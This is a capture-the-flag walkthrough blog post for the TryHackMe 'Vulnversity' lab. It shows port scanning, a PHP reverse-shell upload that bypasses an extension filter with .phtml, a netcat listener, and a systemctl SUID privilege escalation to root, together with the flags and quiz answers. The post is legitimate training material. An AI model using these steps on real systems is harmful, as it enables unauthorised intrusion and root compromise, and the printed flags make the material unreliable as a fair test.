CTF Walk Through | HackProof Academy | [email protected]

2 subscriber(s)


04/12/2024 Shad Hussain Knowledge Views 206 Comments 0 Analytics Video English DMCA Add Favorite Copy Link
CTF Walk Through - Vulnversity - THM

Room Link : https://tryhackme.com/r/room/vulnversity STEP1 nmap -p- -sSV 10.10.142.86 -Pn -T4 -A FINDING PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0) 139/tcp open netbios-ssn? 445/tcp open microsoft-ds? 3128/tcp open squid-http? 3333/tcp open dec-notes? Scan the box; how many ports are open? 6 What version of the squid proxy is running on the machine? 3.5.12 How many ports will Nmap scan if the flag -p-400 was used? 400 What is the most likely operating system this machine is running? Ubuntu What port is the web server running on? 3333 What is the flag for enabling verbose mode using Nmap? -v ----------------------------------------------------------------------------------------------------- STEP2 gobuster dir -u http://10.10.142.86:3333/ -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt FINDING /images (Status: 301) [Size: 320] [-- http://10.10.142.86:3333/images/] /css (Status: 301) [Size: 317] [-- http://10.10.142.86:3333/css/] /js (Status: 301) [Size: 316] [-- http://10.10.142.86:3333/js/] /internal (Status: 301) [Size: 322] [-- http://10.10.142.86:3333/internal/] What is the directory that has an upload form page? /internal/ ----------------------------------------------------------------------------------------------------- STEP3 dirb http://10.10.142.86:3333/internal/ FINDING = DIRECTORY: http://10.10.142.86:3333/internal/uploads/ ----------------------------------------------------------------------------------------------------- STEP4 upload a phprevershell.phtml @ http://10.10.142.86:3333/internal/ try these extentions .php .php3 .php4 .php5 .phtml see uploaded file @ http://10.10.142.86:3333/internal/uploads/ on new terminal nc -nvlp 1234 @ http://10.10.142.86:3333/internal/uploads/revershell.phtml get reverse connection on the terminal cd /home cd bill cat user.txt FINDING 8bd7992fbe8a6ad22a63361004cfcedb What common file type youd want to upload to exploit the server is blocked? Try a couple to find out. .php What extension is allowed after running the above exercise? .phtml What is the name of the user who manages the webserver? bill What is the user flag? 8bd7992fbe8a6ad22a63361004cfcedb ----------------------------------------------------------------------------------------------------- STEP5 python -c import pty; pty.spawn("/bin/bash") find / -type f -perm -4000 2/dev/null FINDING /bin/systemctl On the system, search for all SUID files. Which file stands out? /bin/systemctl ----------------------------------------------------------------------------------------------------- STEP6 now use -- https://gtfobins.github.io/gtfobins/systemctl/ on shell -- type below TF=$(mktemp).service echo [Service] Type=oneshot ExecStart=/bin/sh -c "chmod +s /bin/bash" [Install] WantedBy=multi-user.target $TF /bin/systemctl link $TF /bin/systemctl enable --now $TF bash -p cd /root ls cat root.txt a58ff8579f0a9270368d33a9966c7fd5 FINDING What is the root flag value? a58ff8579f0a9270368d33a9966c7fd5 -----------------------------------------------------------------------------------------------------

Related articles

 WhatsApp no. else use your mail id to get the otp...!    Please tick to get otp in your mail id...!
 





© mutebreak.com | All Rights Reserved